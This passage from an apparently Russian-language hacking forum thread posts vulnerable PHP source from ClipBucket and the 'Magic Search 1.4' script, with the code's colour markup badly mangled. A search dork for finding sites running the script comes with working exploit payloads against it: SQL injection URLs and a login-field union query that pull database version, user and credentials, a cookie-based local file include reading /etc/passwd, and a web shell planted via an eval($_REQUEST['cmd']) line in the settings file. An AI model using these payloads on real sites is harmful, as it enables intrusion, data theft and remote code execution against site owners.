[/COLOR][COLOR="#0000BB"]increment_views[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_id'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'photo'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'object'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$userquery[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_user_details[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]]));
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'photo_title'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' « '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$collect[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'collection_name'[/COLOR][COLOR="#007700"]]);
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
} else {
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"item_not_exist"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
}
break;
}
}
}
} else
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]template_files[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_item.html'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]display_it[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
watch_video.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]perm_check[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'view_video'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]page_redir[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]//Getting Video Key
[/COLOR][COLOR="#0000BB"]$vkey[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'v'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvid[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_video[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vkey[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'vdo'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]video_playable[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#FF8000"]/**
* Please check http://code.google.com/p/clipbucket/issues/detail?id=168
* for more details about following code
*/
[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]SEO[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'yes'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]//Checking if Video URL is Exactly What we have created
[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]videoLink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//What we are getting
[/COLOR][COLOR="#0000BB"]$server_link[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$server_link[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//Now finally Checking if both are equal else redirect to new link
[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$vid_link_seo[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$server_link_seo[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]//Redirect to valid link leaving mark 301 Permanent Redirect
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'HTTP/1.1 301 Moved Permanently'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$vid_link[/COLOR][COLOR="#007700"]);
exit();
}
}
[/COLOR][COLOR="#FF8000"]//Checking for playlist
[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'play_list'[/COLOR][COLOR="#007700"]];
if(!empty([/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$plist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$cbvid[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_playlist[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]userid[/COLOR][COLOR="#007700"]());
if([/COLOR][COLOR="#0000BB"]$plist[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cur_playlist'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//Calling Functions When Video Is going to play
[/COLOR][COLOR="#0000BB"]call_watch_video_function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]subtitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]);
}else
[/COLOR][COLOR="#0000BB"]$Cbucket[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]//Return category id without '#'
[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$vdo[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'#'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
}else{
[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$v_cat[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];}
[/COLOR][COLOR="#0000BB"]$vid_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'%#%'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$video_cat[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'vid_cat'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vid_cat[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//Displaying The Template
[/COLOR][COLOR="#0000BB"]template_files[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'watch_video.html'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]display_it[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
functions.php[/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'mysql_clean'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]))
{
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'no_html'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'special_html'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mysql_clean'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$array[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'nl2br'[/COLOR][COLOR="#007700"]])
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//This Fucntion is for Securing Password, you may change its combination for security reason but make sure dont not rechange once you made your script run
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]pass_code[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sha1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"])))));
return[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//Mysql Clean Queries
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sql_free[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
if (![/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]mysql_clean[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$replacer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#FF8000"]//$id = clean($id);
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]));
if([/COLOR][COLOR="#0000BB"]$replacer[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Replacer[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]escape_gpc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"])
{
if ([/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$in[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//Redirect Using JAVASCRIPT
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]redirect_to[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]'
window.location = "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'"
'[/COLOR][COLOR="#007700"];
exit([/COLOR][COLOR="#DD0000"]"Javascript is turned off, click here to go to requested page"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//Test function to return template file
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]Fetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$inside[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"])
{
if([/COLOR][COLOR="#0000BB"]$inside[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]fetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);
else
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]fetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]LAYOUT[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//Simple Template Displaying Function
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]Template[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$layout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]){
global[/COLOR][COLOR="#0000BB"]$admin_area[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$layout[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]LAYOUT[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);
else
[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'footer.html'[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$admin_area[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]TRUE[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]BASEDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/includes/templatelib/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);
}
if([/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'header.html'[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]display[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]BASEDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/includes/templatelib/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$template[/COLOR][COLOR="#007700"]);
}
}
function[/COLOR][COLOR="#0000BB"]Assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]CBTemplate[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]assign[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//Funtion of Random String
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]RandomString[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$highest_startpoint[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]32[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$randomString[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$highest_startpoint[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$randomString[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
|
|
|
|
03.11.2011, 21:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Magic Search 1.4(http://magicsearch.pp.ua/)
dorks: "Created by Kiria-Studio"
В продолжение этой темы: /thread298944.html
SQL Injection
/static.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'str'[/COLOR][COLOR="#007700"]])) {[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'str'[/COLOR][COLOR="#007700"]]; }
if (!isset([/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#FF8000"]/* Проверяем, является ли переменная числом */
[/COLOR][COLOR="#007700"]if (![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"|^[\d]+$|"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"])) {
exit ([/COLOR][COLOR="#DD0000"]"Неверный формат запроса! Проверьте url!
Если вы уверены что мы дали вам данную ссылку сообщите нам с помощью обратной связи "[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM static WHERE str='[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]/**
Логики вообще никакой. Если есть $_GET['str'] то устанавливаем переменную $str, если нет, то проверяем, является ли она числом. оО
Ну и без какой-либо обработки собственно происходит запрос в базу данных.
**/
[/COLOR][/COLOR]
PoC:
Код:
Code:
/static.php?str='+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database())+--+
NEED: magiq_quotes = OFF
Local File Include
/page.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'langu'[/COLOR][COLOR="#007700"]]) {
include_once([/COLOR][COLOR="#DD0000"]"./languages/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'langu'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"-language.php"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
PoC:
Код:
Code:
В cookies:
langu=../../../../../etc/passwd%00
Shell Upload
не уверен что можно так назвать эту уязвимость Жесткий и палевный метод.
/install.php
PHP код:
PHP:
[COLOR="#000000"]if(isset($_POST['go_ed'])) {
if (!is_writable("settings/database.php")) {
print "Файла database.php несуществует или незаданы права доступа 666";
} else {
$fhandle=fopen("settings/database.php","w");
fwrite($fhandle,"[COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]'40'[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: index.php"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]]) && ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'passwd'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]))[/COLOR][/COLOR]
Конечно, данная строка нас должна удручить.
Но! =)
PoC:
Код:
Code:
Login: ' AND 1=2 UNION SELECT 1,SUBSTR(info,37,LENGTH(info)-36-1),3,50 FROM information_schema.processlist --
Password: 3
NEED: magiq_quotes = OFF
Shell Upload
Нужны права на правку /settings/conf.php, и права администратора.
URL: /admin/?f=settings
Редактируем любой параметр на
Код:
Code:
'; @eval($_REQUEST['cmd']); $s='
Выполнение кода:
Код:
Code:
/settings/conf.php?cmd=phpinfo();
NEED: magiq_quotes = OFF
Узнаем логин:пароль к базе данных.
/dumper.php
PHP код:
PHP:
